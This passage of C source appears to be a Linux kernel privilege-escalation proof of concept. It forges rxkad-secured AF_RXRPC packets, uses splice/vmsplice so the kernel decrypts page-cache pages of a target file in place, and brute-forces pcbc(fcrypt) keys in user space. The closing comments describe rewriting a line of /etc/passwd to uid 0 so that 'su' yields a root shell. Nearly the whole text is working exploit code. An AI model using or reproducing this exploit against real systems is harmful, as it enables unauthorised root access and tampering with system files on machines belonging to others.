	if (sendmsg(op_fd, &msg, 0) < 0) {
		WARN("AF_ALG sendmsg: %s", strerror(errno));
		close(op_fd); return -1;
	}
	ssize_t n = read(op_fd, out, inlen);
	close(op_fd);
	if (n != (ssize_t)inlen) {
		WARN("AF_ALG read got %zd want %zu: %s",
				n, inlen, strerror(errno));
		return -1;
	}
	return 0;
}

/* Compute conn->rxkad.csum_iv (ref: rxkad_prime_packet_security):
 *   tmpbuf[0..3] = htonl(epoch, cid, 0, security_ix)  (16 B)
 *   PCBC-encrypt(tmpbuf, IV=session_key) → out[16]
 *   csum_iv = out[8..15]   (last 8 B = "tmpbuf[2..3]" after encryption)
 */
static int compute_csum_iv(uint32_t epoch, uint32_t cid, uint32_t sec_ix,
		const uint8_t key[8], uint8_t csum_iv[8])
{
	int s = alg_open_pcbc_fcrypt(key);
	if (s < 0) return -1;
	uint32_t in[4]  = { htonl(epoch), htonl(cid), 0, htonl(sec_ix) };
	uint8_t  out[16];
	int rc = alg_op(s, ALG_OP_ENCRYPT, key, in, 16, out);
	close(s);
	if (rc < 0) return -1;
	memcpy(csum_iv, out + 8, 8);
	return 0;
}

/* Compute the wire cksum (ref: rxkad_secure_packet @rxkad.c:342):
 *   x = (cid_low2 << 30) | (seq & 0x3fffffff)
 *   buf[0] = htonl(call_id), buf[1] = htonl(x)    (8 B)
 *   PCBC-encrypt(buf, IV=csum_iv) → enc[8]
 *   y = ntohl(enc[1]); cksum = (y >> 16) & 0xffff;  if zero -> 1
 */
static int compute_cksum(uint32_t cid, uint32_t call_id, uint32_t seq,
		const uint8_t key[8], const uint8_t csum_iv[8],
		uint16_t *cksum_out)
{
	int s = alg_open_pcbc_fcrypt(key);
	if (s < 0) return -1;
	uint32_t x = (cid & RXRPC_CHANNELMASK) << (32 - RXRPC_CIDSHIFT);
	x |= seq & 0x3fffffff;
	uint32_t in[2] = { htonl(call_id), htonl(x) };
	uint32_t out[2];
	int rc = alg_op(s, ALG_OP_ENCRYPT, csum_iv, in, 8, out);
	close(s);
	if (rc < 0) return -1;
	uint32_t y = ntohl(out[1]);
	uint16_t v = (y >> 16) & 0xffff;
	if (v == 0) v = 1;
	*cksum_out = v;
	return 0;
}

/* =================================================================== */
/* AF_RXRPC client                                                      */
/* =================================================================== */

static int setup_rxrpc_client(uint16_t local_port, const char *keyname)
{
	int fd = socket(AF_RXRPC, SOCK_DGRAM, PF_INET);
	if (fd < 0) { WARN("socket(AF_RXRPC client): %s", strerror(errno)); return -1; }
	if (setsockopt(fd, SOL_RXRPC, RXRPC_SECURITY_KEY,
				keyname, strlen(keyname)) < 0) {
		WARN("client SECURITY_KEY: %s", strerror(errno)); close(fd); return -1;
	}
	int min_level = RXRPC_SECURITY_AUTH;
	if (setsockopt(fd, SOL_RXRPC, RXRPC_MIN_SECURITY_LEVEL,
				&min_level, sizeof(min_level)) < 0) {
		WARN("client MIN_SECURITY_LEVEL: %s", strerror(errno));
		close(fd); return -1;
	}
	struct sockaddr_rxrpc srx = {0};
	srx.srx_family = AF_RXRPC;
	srx.srx_service = 0;
	srx.transport_type = SOCK_DGRAM;
	srx.transport_len = sizeof(struct sockaddr_in);
	srx.transport.sin.sin_family = AF_INET;
	srx.transport.sin.sin_port = htons(local_port);
	srx.transport.sin.sin_addr.s_addr = htonl(0x7F000001);
	if (bind(fd, (struct sockaddr *)&srx, sizeof(srx)) < 0) {
		WARN("client bind :%u: %s", local_port, strerror(errno));
		close(fd); return -1;
	}
	LOG("AF_RXRPC client bound :%u", local_port);
	return fd;
}

static int rxrpc_client_initiate_call(int cli_fd, uint16_t srv_port,
		uint16_t service_id,
		unsigned long user_call_id)
{
	char data[8] = "PINGPING";
	struct sockaddr_rxrpc srx = {0};
	srx.srx_family = AF_RXRPC;
	srx.srx_service = service_id;
	srx.transport_type = SOCK_DGRAM;
	srx.transport_len = sizeof(struct sockaddr_in);
	srx.transport.sin.sin_family = AF_INET;
	srx.transport.sin.sin_port = htons(srv_port);
	srx.transport.sin.sin_addr.s_addr = htonl(0x7F000001);

	char cmsg_buf[CMSG_SPACE(sizeof(unsigned long))];
	struct msghdr msg = {0};
	msg.msg_name = &srx; msg.msg_namelen = sizeof(srx);
	struct iovec iov = { .iov_base = data, .iov_len = sizeof(data) };
	msg.msg_iov = &iov; msg.msg_iovlen = 1;
	msg.msg_control = cmsg_buf; msg.msg_controllen = sizeof(cmsg_buf);
	struct cmsghdr *cmsg = CMSG_FIRSTHDR(&msg);
	cmsg->cmsg_level = SOL_RXRPC;
	cmsg->cmsg_type = RXRPC_USER_CALL_ID;
	cmsg->cmsg_len = CMSG_LEN(sizeof(unsigned long));
	*(unsigned long *)CMSG_DATA(cmsg) = user_call_id;

	/* Don't block forever if no reply ever comes through this single sendmsg. */
	int fl = fcntl(cli_fd, F_GETFL);
	fcntl(cli_fd, F_SETFL, fl | O_NONBLOCK);

	ssize_t n = sendmsg(cli_fd, &msg, 0);
	fcntl(cli_fd, F_SETFL, fl);
	if (n < 0) {
		if (errno == EAGAIN || errno == EWOULDBLOCK) {
			LOG("client sendmsg returned EAGAIN (expected; kernel will keep "
					"retrying handshake)");
			return 0;
		}
		WARN("client sendmsg: %s", strerror(errno));
		return -1;
	}
	LOG("client sendmsg %zd B → :%u (handshake will follow asynchronously)",
			n, srv_port);
	return 0;
}

/* =================================================================== */
/* fake-server (plain UDP)                                              */
/* =================================================================== */

static int setup_udp_server(uint16_t port)
{
	int s = socket(AF_INET, SOCK_DGRAM, 0);
	if (s < 0) { WARN("socket(udp server): %s", strerror(errno)); return -1; }
	struct sockaddr_in sa = {0};
	sa.sin_family = AF_INET;
	sa.sin_port = htons(port);
	sa.sin_addr.s_addr = htonl(0x7F000001);
	if (bind(s, (struct sockaddr *)&sa, sizeof(sa)) < 0) {
		WARN("udp server bind :%u: %s", port, strerror(errno));
		close(s); return -1;
	}
	LOG("plain UDP fake-server bound :%u", port);
	return s;
}

/* Receive one UDP datagram with timeout (ms). Returns bytes or -1. */
static ssize_t udp_recv_to(int s, void *buf, size_t cap,
		struct sockaddr_in *from, int timeout_ms)
{
	struct pollfd pfd = { .fd = s, .events = POLLIN };
	int rc = poll(&pfd, 1, timeout_ms);
	if (rc <= 0) return -1;
	socklen_t fl = from ? sizeof(*from) : 0;
	return recvfrom(s, buf, cap, 0,
			(struct sockaddr *)from, from ? &fl : NULL);
}

/* =================================================================== */
/* main PoC                                                             */
/* =================================================================== */

static int trigger_seq = 0;

static int do_one_trigger(int target_fd, off_t splice_off, size_t splice_len)
{
	char keyname[32];
	snprintf(keyname, sizeof(keyname), "evil%d", trigger_seq++);

	long key = add_rxrpc_key(keyname);
	if (key < 0) {
		if (trigger_seq < 5) WARN("add_rxrpc_key(%s): %s", keyname, strerror(errno));
		return -1;
	}

	/* Use varying ports so kernel TIME_WAIT / stale state does not bite. */
	uint16_t port_S = 7777 + (trigger_seq * 2 % 200);
	uint16_t port_C = port_S + 1;
	uint16_t svc_id = 1234;

	int udp_srv = setup_udp_server(port_S);
	if (udp_srv < 0) {
		if (trigger_seq < 5) WARN("setup_udp_server(%u) failed", port_S);
		syscall(SYS_keyctl, 3 /*KEYCTL_INVALIDATE*/, key); return -1;
	}

	int rxsk_cli = setup_rxrpc_client(port_C, keyname);
	if (rxsk_cli < 0) {
		if (trigger_seq < 5) WARN("setup_rxrpc_client(%u, %s) failed", port_C, keyname);
		close(udp_srv); syscall(SYS_keyctl, 3, key); return -1;
	}

	if (rxrpc_client_initiate_call(rxsk_cli, port_S, svc_id, 0xDEAD) < 0) {
		if (trigger_seq < 5) WARN("rxrpc_client_initiate_call failed");
		close(rxsk_cli); close(udp_srv); syscall(SYS_keyctl, 3, key); return -1;
	}

	uint8_t pkt[2048];
	struct sockaddr_in cli_addr;
	ssize_t n = udp_recv_to(udp_srv, pkt, sizeof(pkt), &cli_addr, 1500);
	if (n < (ssize_t)sizeof(struct rxrpc_wire_header)) {
		if (trigger_seq < 5) WARN("udp_recv_to: n=%zd errno=%s", n, strerror(errno));
		close(rxsk_cli); close(udp_srv); syscall(SYS_keyctl, 3, key); return -1;
	}
	struct rxrpc_wire_header *whdr_in = (struct rxrpc_wire_header *)pkt;
	uint32_t epoch  = ntohl(whdr_in->epoch);
	uint32_t cid    = ntohl(whdr_in->cid);
	uint32_t callN  = ntohl(whdr_in->callNumber);
	uint16_t svc_in = ntohs(whdr_in->serviceId);
	uint16_t cli_port = ntohs(cli_addr.sin_port);

	/* Send CHALLENGE */
	{
		struct {
			struct rxrpc_wire_header hdr;
			struct rxkad_challenge   ch;
		} __attribute__((packed)) c = {0};
		c.hdr.epoch = htonl(epoch);
		c.hdr.cid = htonl(cid);
		c.hdr.callNumber = 0; c.hdr.seq = 0;
		c.hdr.serial = htonl(0x10000);
		c.hdr.type = RXRPC_PACKET_TYPE_CHALLENGE;
		c.hdr.securityIndex = 2;
		c.hdr.serviceId = htons(svc_in);
		c.ch.version = htonl(2); c.ch.nonce = htonl(0xDEADBEEFu);
		c.ch.min_level = htonl(1);
		struct sockaddr_in to = { .sin_family=AF_INET, .sin_port=htons(cli_port),
			.sin_addr.s_addr=htonl(0x7F000001) };
		if (sendto(udp_srv, &c, sizeof(c), 0, (struct sockaddr*)&to, sizeof(to)) < 0) {
			close(rxsk_cli); close(udp_srv); syscall(SYS_keyctl, 3, key); return -1;
		}
	}

	/* Drain RESPONSE (best-effort) */
	for (int i = 0; i < 4; i++) {
		struct sockaddr_in src;
		if (udp_recv_to(udp_srv, pkt, sizeof(pkt), &src, 500) < 0) break;
	}

	/* csum + cksum with CURRENT SESSION_KEY */
	uint8_t csum_iv[8] = {0};
	if (compute_csum_iv(epoch, cid, 2, SESSION_KEY, csum_iv) < 0) {
		close(rxsk_cli); close(udp_srv); syscall(SYS_keyctl, 3, key); return -1;
	}
	uint16_t cksum_h = 0;
	if (compute_cksum(cid, callN, 1, SESSION_KEY, csum_iv, &cksum_h) < 0) {
		close(rxsk_cli); close(udp_srv); syscall(SYS_keyctl, 3, key); return -1;
	}

	/* Build malicious DATA header */
	struct rxrpc_wire_header mal = {0};
	mal.epoch = htonl(epoch);
	mal.cid = htonl(cid);
	mal.callNumber = htonl(callN);
	mal.seq = htonl(1);
	mal.serial = htonl(0x42000);
	mal.type = RXRPC_PACKET_TYPE_DATA;
	mal.flags = RXRPC_LAST_PACKET;
	mal.securityIndex = 2;
	mal.cksum = htons(cksum_h);
	mal.serviceId = htons(svc_in);

	/* connect udp_srv → client port for splice */
	struct sockaddr_in dst = { .sin_family=AF_INET, .sin_port=htons(cli_port),
		.sin_addr.s_addr=htonl(0x7F000001) };
	if (connect(udp_srv, (struct sockaddr*)&dst, sizeof(dst)) < 0) {
		close(rxsk_cli); close(udp_srv); syscall(SYS_keyctl, 3, key); return -1;
	}

	/* pipe + vmsplice header + splice file → pipe → udp_srv */
	int p[2];
	if (pipe(p) < 0) {
		close(rxsk_cli); close(udp_srv); syscall(SYS_keyctl, 3, key); return -1;
	}
	{
		struct iovec viv = { .iov_base = &mal, .iov_len = sizeof(mal) };
		if (vmsplice(p[1], &viv, 1, 0) < 0) goto trig_fail;
	}
	{
		loff_t off = splice_off;
		if (splice(target_fd, &off, p[1], NULL, splice_len, SPLICE_F_NONBLOCK) < 0)
			goto trig_fail;
	}
	if (splice(p[0], NULL, udp_srv, NULL, sizeof(mal) + splice_len, 0) < 0) {
		goto trig_fail;
	}
	close(p[0]); close(p[1]);

	/* recvmsg the malicious DATA into the kernel's verify_packet path */
	int fl = fcntl(rxsk_cli, F_GETFL);
	fcntl(rxsk_cli, F_SETFL, fl | O_NONBLOCK);
	for (int round = 0; round < 5; round++) {
		char rb[2048];
		struct sockaddr_rxrpc srx;
		char ccb[256];
		struct msghdr m = {0};
		struct iovec iv = { .iov_base = rb, .iov_len = sizeof(rb) };
		m.msg_name = &srx; m.msg_namelen = sizeof(srx);
		m.msg_iov = &iv;  m.msg_iovlen = 1;
		m.msg_control = ccb; m.msg_controllen = sizeof(ccb);
		ssize_t r = recvmsg(rxsk_cli, &m, 0);
		if (r > 0) break;
		if (errno == EAGAIN || errno == EWOULDBLOCK) usleep(20000);
		else break;
	}
	fcntl(rxsk_cli, F_SETFL, fl);

	close(rxsk_cli);
	close(udp_srv);
	syscall(SYS_keyctl, 3, key);
	return 0;

trig_fail:
	close(p[0]); close(p[1]);
	close(rxsk_cli); close(udp_srv); syscall(SYS_keyctl, 3, key);
	return -1;
}

/* ===================================================================
 * USER-SPACE pcbc(fcrypt) BRUTE-FORCE
 *
 * The kernel's rxkad_verify_packet_1() does an in-place 8-byte
 * pcbc(fcrypt) decrypt with iv=0 over the page-cache page at the splice
 * offset.  pcbc with single 8-B block and IV=0 reduces to a plain
 * fcrypt_decrypt(C, K).  We can therefore search for the right K
 * entirely in user-space — without touching the kernel/VM at all —
 * before applying ONE deterministic kernel trigger.
 *
 * Port of crypto/fcrypt.c from the kernel source (David Howells / KTH).
 * Verified against kernel test vectors:
 *   K=0,         decrypt(0E0900C73EF7ED41) = 00000000
 *   K=1144...66, decrypt(D8ED787477EC0680) = 123456789ABCDEF0
 * =================================================================== */

static const uint8_t fc_sbox0_raw[256] = {
	0xea, 0x7f, 0xb2, 0x64, 0x9d, 0xb0, 0xd9, 0x11, 0xcd, 0x86, 0x86, 0x91, 0x0a, 0xb2, 0x93, 0x06,
	0x0e, 0x06, 0xd2, 0x65, 0x73, 0xc5, 0x28, 0x60, 0xf2, 0x20, 0xb5, 0x38, 0x7e, 0xda, 0x9f, 0xe3,
	0xd2, 0xcf, 0xc4, 0x3c, 0x61, 0xff, 0x4a, 0x4a, 0x35, 0xac, 0xaa, 0x5f, 0x2b, 0xbb, 0xbc, 0x53,
	0x4e, 0x9d, 0x78, 0xa3, 0xdc, 0x09, 0x32, 0x10, 0xc6, 0x6f, 0x66, 0xd6, 0xab, 0xa9, 0xaf, 0xfd,
	0x3b, 0x95, 0xe8, 0x34, 0x9a, 0x81, 0x72, 0x80, 0x9c, 0xf3, 0xec, 0xda, 0x9f, 0x26, 0x76, 0x15,
	0x3e, 0x55, 0x4d, 0xde, 0x84, 0xee, 0xad, 0xc7, 0xf1, 0x6b, 0x3d, 0xd3, 0x04, 0x49, 0xaa, 0x24,
	0x0b, 0x8a, 0x83, 0xba, 0xfa, 0x85, 0xa0, 0xa8, 0xb1, 0xd4, 0x01, 0xd8, 0x70, 0x64, 0xf0, 0x51,
	0xd2, 0xc3, 0xa7, 0x75, 0x8c, 0xa5, 0x64, 0xef, 0x10, 0x4e, 0xb7, 0xc6, 0x61, 0x03, 0xeb, 0x44,
	0x3d, 0xe5, 0xb3, 0x5b, 0xae, 0xd5, 0xad, 0x1d, 0xfa, 0x5a, 0x1e, 0x33, 0xab, 0x93, 0xa2, 0xb7,
	0xe7, 0xa8, 0x45, 0xa4, 0xcd, 0x29, 0x63, 0x44, 0xb6, 0x69, 0x7e, 0x2e, 0x62, 0x03, 0xc8, 0xe0,
	0x17, 0xbb, 0xc7, 0xf3, 0x3f, 0x36, 0xba, 0x71, 0x8e, 0x97, 0x65, 0x60, 0x69, 0xb6, 0xf6, 0xe6,
	0x6e, 0xe0, 0x81, 0x59, 0xe8, 0xaf, 0xdd, 0x95, 0x22, 0x99, 0xfd, 0x63, 0x19, 0x74, 0x61, 0xb1,
	0xb6, 0x5b, 0xae, 0x54, 0xb3, 0x70, 0xff, 0xc6, 0x3b, 0x3e, 0xc1, 0xd7, 0xe1, 0x0e, 0x76, 0xe5,
	0x36, 0x4f, 0x59, 0xc7, 0x08, 0x6e, 0x82, 0xa6, 0x93, 0xc4, 0xaa, 0x26, 0x49, 0xe0, 0x21, 0x64,
	0x07, 0x9f, 0x64, 0x81, 0x9c, 0xbf, 0xf9, 0xd1, 0x43, 0xf8, 0xb6, 0xb9, 0xf1, 0x24, 0x75, 0x03,
	0xe4, 0xb0, 0x99, 0x46, 0x3d, 0xf5, 0xd1, 0x39, 0x72, 0x12, 0xf6, 0xba, 0x0c, 0x0d, 0x42, 0x2e,
};
static const uint8_t fc_sbox1_raw[256] = {
	0x77, 0x14, 0xa6, 0xfe, 0xb2, 0x5e, 0x8c, 0x3e, 0x67, 0x6c, 0xa1, 0x0d, 0xc2, 0xa2, 0xc1, 0x85,
	0x6c, 0x7b, 0x67, 0xc6, 0x23, 0xe3, 0xf2, 0x89, 0x50, 0x9c, 0x03, 0xb7, 0x73, 0xe6, 0xe1, 0x39,
	0x31, 0x2c, 0x27, 0x9f, 0xa5, 0x69, 0x44, 0xd6, 0x23, 0x83, 0x98, 0x7d, 0x3c, 0xb4, 0x2d, 0x99,
	0x1c, 0x1f, 0x8c, 0x20, 0x03, 0x7c, 0x5f, 0xad, 0xf4, 0xfa, 0x95, 0xca, 0x76, 0x44, 0xcd, 0xb6,
	0xb8, 0xa1, 0xa1, 0xbe, 0x9e, 0x54, 0x8f, 0x0b, 0x16, 0x74, 0x31, 0x8a, 0x23, 0x17, 0x04, 0xfa,
	0x79, 0x84, 0xb1, 0xf5, 0x13, 0xab, 0xb5, 0x2e, 0xaa, 0x0c, 0x60, 0x6b, 0x5b, 0xc4, 0x4b, 0xbc,
	0xe2, 0xaf, 0x45, 0x73, 0xfa, 0xc9, 0x49, 0xcd, 0x00, 0x92, 0x7d, 0x97, 0x7a, 0x18, 0x60, 0x3d,
	0xcf, 0x5b, 0xde, 0xc6, 0xe2, 0xe6, 0xbb, 0x8b, 0x06, 0xda, 0x08, 0x15, 0x1b, 0x88, 0x6a, 0x17,
	0x89, 0xd0, 0xa9, 0xc1, 0xc9, 0x70, 0x6b, 0xe5, 0x43, 0xf4, 0x68, 0xc8, 0xd3, 0x84, 0x28, 0x0a,
	0x52, 0x66, 0xa3, 0xca, 0xf2, 0xe3, 0x7f, 0x7a, 0x31, 0xf7, 0x88, 0x94, 0x5e, 0x9c, 0x63, 0xd5,
	0x24, 0x66, 0xfc, 0xb3, 0x57, 0x25, 0xbe, 0x89, 0x44, 0xc4, 0xe0, 0x8f, 0x23, 0x3c, 0x12, 0x52,
	0xf5, 0x1e, 0xf4, 0xcb, 0x18, 0x33, 0x1f, 0xf8, 0x69, 0x10, 0x9d, 0xd3, 0xf7, 0x28, 0xf8, 0x30,
	0x05, 0x5e, 0x32, 0xc0, 0xd5, 0x19, 0xbd, 0x45, 0x8b, 0x5b, 0xfd, 0xbc, 0xe2, 0x5c, 0xa9, 0x96,
	0xef, 0x70, 0xcf, 0xc2, 0x2a, 0xb3, 0x61, 0xad, 0x80, 0x48, 0x81, 0xb7, 0x1d, 0x43, 0xd9, 0xd7,
	0x45, 0xf0, 0xd8, 0x8a, 0x59, 0x7c, 0x57, 0xc1, 0x79, 0xc7, 0x34, 0xd6, 0x43, 0xdf, 0xe4, 0x78,
	0x16, 0x06, 0xda, 0x92, 0x76, 0x51, 0xe1, 0xd4, 0x70, 0x03, 0xe0, 0x2f, 0x96, 0x91, 0x82, 0x80,
};
static const uint8_t fc_sbox2_raw[256] = {
	0xf0, 0x37, 0x24, 0x53, 0x2a, 0x03, 0x83, 0x86, 0xd1, 0xec, 0x50, 0xf0, 0x42, 0x78, 0x2f, 0x6d,
	0xbf, 0x80, 0x87, 0x27, 0x95, 0xe2, 0xc5, 0x5d, 0xf9, 0x6f, 0xdb, 0xb4, 0x65, 0x6e, 0xe7, 0x24,
	0xc8, 0x1a, 0xbb, 0x49, 0xb5, 0x0a, 0x7d, 0xb9, 0xe8, 0xdc, 0xb7, 0xd9, 0x45, 0x20, 0x1b, 0xce,
	0x59, 0x9d, 0x6b, 0xbd, 0x0e, 0x8f, 0xa3, 0xa9, 0xbc, 0x74, 0xa6, 0xf6, 0x7f, 0x5f, 0xb1, 0x68,
	0x84, 0xbc, 0xa9, 0xfd, 0x55, 0x50, 0xe9, 0xb6, 0x13, 0x5e, 0x07, 0xb8, 0x95, 0x02, 0xc0, 0xd0,
	0x6a, 0x1a, 0x85, 0xbd, 0xb6, 0xfd, 0xfe, 0x17, 0x3f, 0x09, 0xa3, 0x8d, 0xfb, 0xed, 0xda, 0x1d,
	0x6d, 0x1c, 0x6c, 0x01, 0x5a, 0xe5, 0x71, 0x3e, 0x8b, 0x6b, 0xbe, 0x29, 0xeb, 0x12, 0x19, 0x34,
	0xcd, 0xb3, 0xbd, 0x35, 0xea, 0x4b, 0xd5, 0xae, 0x2a, 0x79, 0x5a, 0xa5, 0x32, 0x12, 0x7b, 0xdc,
	0x2c, 0xd0, 0x22, 0x4b, 0xb1, 0x85, 0x59, 0x80, 0xc0, 0x30, 0x9f, 0x73, 0xd3, 0x14, 0x48, 0x40,
	0x07, 0x2d, 0x8f, 0x80, 0x0f, 0xce, 0x0b, 0x5e, 0xb7, 0x5e, 0xac, 0x24, 0x94, 0x4a, 0x18, 0x15,
	0x05, 0xe8, 0x02, 0x77, 0xa9, 0xc7, 0x40, 0x45, 0x89, 0xd1, 0xea, 0xde, 0x0c, 0x79, 0x2a, 0x99,
	0x6c, 0x3e, 0x95, 0xdd, 0x8c, 0x7d, 0xad, 0x6f, 0xdc, 0xff, 0xfd, 0x62, 0x47, 0xb3, 0x21, 0x8a,
	0xec, 0x8e, 0x19, 0x18, 0xb4, 0x6e, 0x3d, 0xfd, 0x74, 0x54, 0x1e, 0x04, 0x85, 0xd8, 0xbc, 0x1f,
	0x56, 0xe7, 0x3a, 0x56, 0x67, 0xd6, 0xc8, 0xa5, 0xf3, 0x8e, 0xde, 0xae, 0x37, 0x49, 0xb7, 0xfa,
	0xc8, 0xf4, 0x1f, 0xe0, 0x2a, 0x9b, 0x15, 0xd1, 0x34, 0x0e, 0xb5, 0xe0, 0x44, 0x78, 0x84, 0x59,
	0x56, 0x68, 0x77, 0xa5, 0x14, 0x06, 0xf5, 0x2f, 0x8c, 0x8a, 0x73, 0x80, 0x76, 0xb4, 0x10, 0x86,
};
static const uint8_t fc_sbox3_raw[256] = {
	0xa9, 0x2a, 0x48, 0x51, 0x84, 0x7e, 0x49, 0xe2, 0xb5, 0xb7, 0x42, 0x33, 0x7d, 0x5d, 0xa6, 0x12,
	0x44, 0x48, 0x6d, 0x28, 0xaa, 0x20, 0x6d, 0x57, 0xd6, 0x6b, 0x5d, 0x72, 0xf0, 0x92, 0x5a, 0x1b,
	0x53, 0x80, 0x24, 0x70, 0x9a, 0xcc, 0xa7, 0x66, 0xa1, 0x01, 0xa5, 0x41, 0x97, 0x41, 0x31, 0x82,
	0xf1, 0x14, 0xcf, 0x53, 0x0d, 0xa0, 0x10, 0xcc, 0x2a, 0x7d, 0xd2, 0xbf, 0x4b, 0x1a, 0xdb, 0x16,
	0x47, 0xf6, 0x51, 0x36, 0xed, 0xf3, 0xb9, 0x1a, 0xa7, 0xdf, 0x29, 0x43, 0x01, 0x54, 0x70, 0xa4,
	0xbf, 0xd4, 0x0b, 0x53, 0x44, 0x60, 0x9e, 0x23, 0xa1, 0x18, 0x68, 0x4f, 0xf0, 0x2f, 0x82, 0xc2,
	0x2a, 0x41, 0xb2, 0x42, 0x0c, 0xed, 0x0c, 0x1d, 0x13, 0x3a, 0x3c, 0x6e, 0x35, 0xdc, 0x60, 0x65,
	0x85, 0xe9, 0x64, 0x02, 0x9a, 0x3f, 0x9f, 0x87, 0x96, 0xdf, 0xbe, 0xf2, 0xcb, 0xe5, 0x6c, 0xd4,
	0x5a, 0x83, 0xbf, 0x92, 0x1b, 0x94, 0x00, 0x42, 0xcf, 0x4b, 0x00, 0x75, 0xba, 0x8f, 0x76, 0x5f,
	0x5d, 0x3a, 0x4d, 0x09, 0x12, 0x08, 0x38, 0x95, 0x17, 0xe4, 0x01, 0x1d, 0x4c, 0xa9, 0xcc, 0x85,
	0x82, 0x4c, 0x9d, 0x2f, 0x3b, 0x66, 0xa1, 0x34, 0x10, 0xcd, 0x59, 0x89, 0xa5, 0x31, 0xcf, 0x05,
	0xc8, 0x84, 0xfa, 0xc7, 0xba, 0x4e, 0x8b, 0x1a, 0x19, 0xf1, 0xa1, 0x3b, 0x18, 0x12, 0x17, 0xb0,
	0x98, 0x8d, 0x0b, 0x23, 0xc3, 0x3a, 0x2d, 0x20, 0xdf, 0x13, 0xa0, 0xa8, 0x4c, 0x0d, 0x6c, 0x2f,
	0x47, 0x13, 0x13, 0x52, 0x1f, 0x2d, 0xf5, 0x79, 0x3d, 0xa2, 0x54, 0xbd, 0x69, 0xc8, 0x6b, 0xf3,
	0x05, 0x28, 0xf1, 0x16, 0x46, 0x40, 0xb0, 0x11, 0xd3, 0xb7, 0x95, 0x49, 0xcf, 0xc3, 0x1d, 0x8f,
	0xd8, 0xe1, 0x73, 0xdb, 0xad, 0xc8, 0xc9, 0xa9, 0xa1, 0xc2, 0xc5, 0xe3, 0xba, 0xfc, 0x0e, 0x25,
};

static uint32_t fc_sbox0[256], fc_sbox1[256], fc_sbox2[256], fc_sbox3[256];

#include <endian.h>

static void fcrypt_init_sboxes(void)
{
	for (int i = 0; i < 256; i++) {
		fc_sbox0[i] = htobe32((uint32_t)fc_sbox0_raw[i] << 3);
		fc_sbox1[i] = htobe32(((uint32_t)(fc_sbox1_raw[i] & 0x1f) << 27) |
				((uint32_t)fc_sbox1_raw[i] >> 5));
		fc_sbox2[i] = htobe32((uint32_t)fc_sbox2_raw[i] << 11);
		fc_sbox3[i] = htobe32((uint32_t)fc_sbox3_raw[i] << 19);
	}
}

#define fc_ror56_64(k, n) \
	(k = (k >> (n)) | ((k & ((1ULL << (n)) - 1)) << (56 - (n))))

typedef struct { uint32_t sched[16]; } fcrypt_uctx;

static void fcrypt_user_setkey(fcrypt_uctx *ctx, const uint8_t key[8])
{
	uint64_t k = 0;
	k  = (uint64_t)(key[0] >> 1);
	k <<= 7; k |= (uint64_t)(key[1] >> 1);
	k <<= 7; k |= (uint64_t)(key[2] >> 1);
	k <<= 7; k |= (uint64_t)(key[3] >> 1);
	k <<= 7; k |= (uint64_t)(key[4] >> 1);
	k <<= 7; k |= (uint64_t)(key[5] >> 1);
	k <<= 7; k |= (uint64_t)(key[6] >> 1);
	k <<= 7; k |= (uint64_t)(key[7] >> 1);

	ctx->sched[0x0] = htobe32((uint32_t)k); fc_ror56_64(k, 11);
	ctx->sched[0x1] = htobe32((uint32_t)k); fc_ror56_64(k, 11);
	ctx->sched[0x2] = htobe32((uint32_t)k); fc_ror56_64(k, 11);
	ctx->sched[0x3] = htobe32((uint32_t)k); fc_ror56_64(k, 11);
	ctx->sched[0x4] = htobe32((uint32_t)k); fc_ror56_64(k, 11);
	ctx->sched[0x5] = htobe32((uint32_t)k); fc_ror56_64(k, 11);
	ctx->sched[0x6] = htobe32((uint32_t)k); fc_ror56_64(k, 11);
	ctx->sched[0x7] = htobe32((uint32_t)k); fc_ror56_64(k, 11);
	ctx->sched[0x8] = htobe32((uint32_t)k); fc_ror56_64(k, 11);
	ctx->sched[0x9] = htobe32((uint32_t)k); fc_ror56_64(k, 11);
	ctx->sched[0xa] = htobe32((uint32_t)k); fc_ror56_64(k, 11);
	ctx->sched[0xb] = htobe32((uint32_t)k); fc_ror56_64(k, 11);
	ctx->sched[0xc] = htobe32((uint32_t)k); fc_ror56_64(k, 11);
	ctx->sched[0xd] = htobe32((uint32_t)k); fc_ror56_64(k, 11);
	ctx->sched[0xe] = htobe32((uint32_t)k); fc_ror56_64(k, 11);
	ctx->sched[0xf] = htobe32((uint32_t)k);
}

#define FC_F(R_, L_, sched_) do {                                        \
	union { uint32_t l; uint8_t c[4]; } u;                               \
	u.l = (sched_) ^ (R_);                                               \
	L_ ^= fc_sbox0[u.c[0]] ^ fc_sbox1[u.c[1]] ^                          \
	fc_sbox2[u.c[2]] ^ fc_sbox3[u.c[3]];                           \
} while (0)

static void fcrypt_user_decrypt(const fcrypt_uctx *ctx,
		uint8_t out[8], const uint8_t in[8])
{
	uint32_t L, R;
	memcpy(&L, in, 4);
	memcpy(&R, in + 4, 4);
	FC_F(L, R, ctx->sched[0xf]);
	FC_F(R, L, ctx->sched[0xe]);
	FC_F(L, R, ctx->sched[0xd]);
	FC_F(R, L, ctx->sched[0xc]);
	FC_F(L, R, ctx->sched[0xb]);
	FC_F(R, L, ctx->sched[0xa]);
	FC_F(L, R, ctx->sched[0x9]);
	FC_F(R, L, ctx->sched[0x8]);
	FC_F(L, R, ctx->sched[0x7]);
	FC_F(R, L, ctx->sched[0x6]);
	FC_F(L, R, ctx->sched[0x5]);
	FC_F(R, L, ctx->sched[0x4]);
	FC_F(L, R, ctx->sched[0x3]);
	FC_F(R, L, ctx->sched[0x2]);
	FC_F(L, R, ctx->sched[0x1]);
	FC_F(R, L, ctx->sched[0x0]);
	memcpy(out, &L, 4);
	memcpy(out + 4, &R, 4);
}

/* For the 2-splice chain we want the line to have EXACTLY 6 ':' and a
 * shell field that equals "/bin/bash" (in /etc/shells, valid path).
 * The two splices interlock as:
 *
 *   bytes 7..14  (offset 2800): P1 — sets uid=0, gid=1 digit, then
 *                4 random gecos-prefix bytes.
 *   bytes 15..22 (offset 2808): P2 — wipes the original ':' at line
 *                pos 16, preserves ':' at pos 21 and '/' at pos 22.
 *
 *   Combined line: "test:x:0:G:GGGGGGGGGG:/home/test:/bin/bash"
 *                   pos 0    8    21       32
 *
 *   pw_uid=0, pw_gid=G, pw_dir="/home/test", pw_shell="/bin/bash".
 *   Now `su -s /bin/bash test` proceeds through the restricted_shell()
 *   check (because /bin/bash IS in /etc/shells) and exec()s /bin/bash
 *   under uid=0.
 *
 * === 3-splice predicates ===
 *
 * After applying splices A, B, C in order to /etc/passwd line 1
 * (offsets 4, 6, 8 — each 8 bytes, last-write-wins), the final state
 * of chars 4..15 is determined by these P bytes:
 *
 *   char 4  = P_A[0]   want: ':'
 *   char 5  = P_A[1]   want: ':'
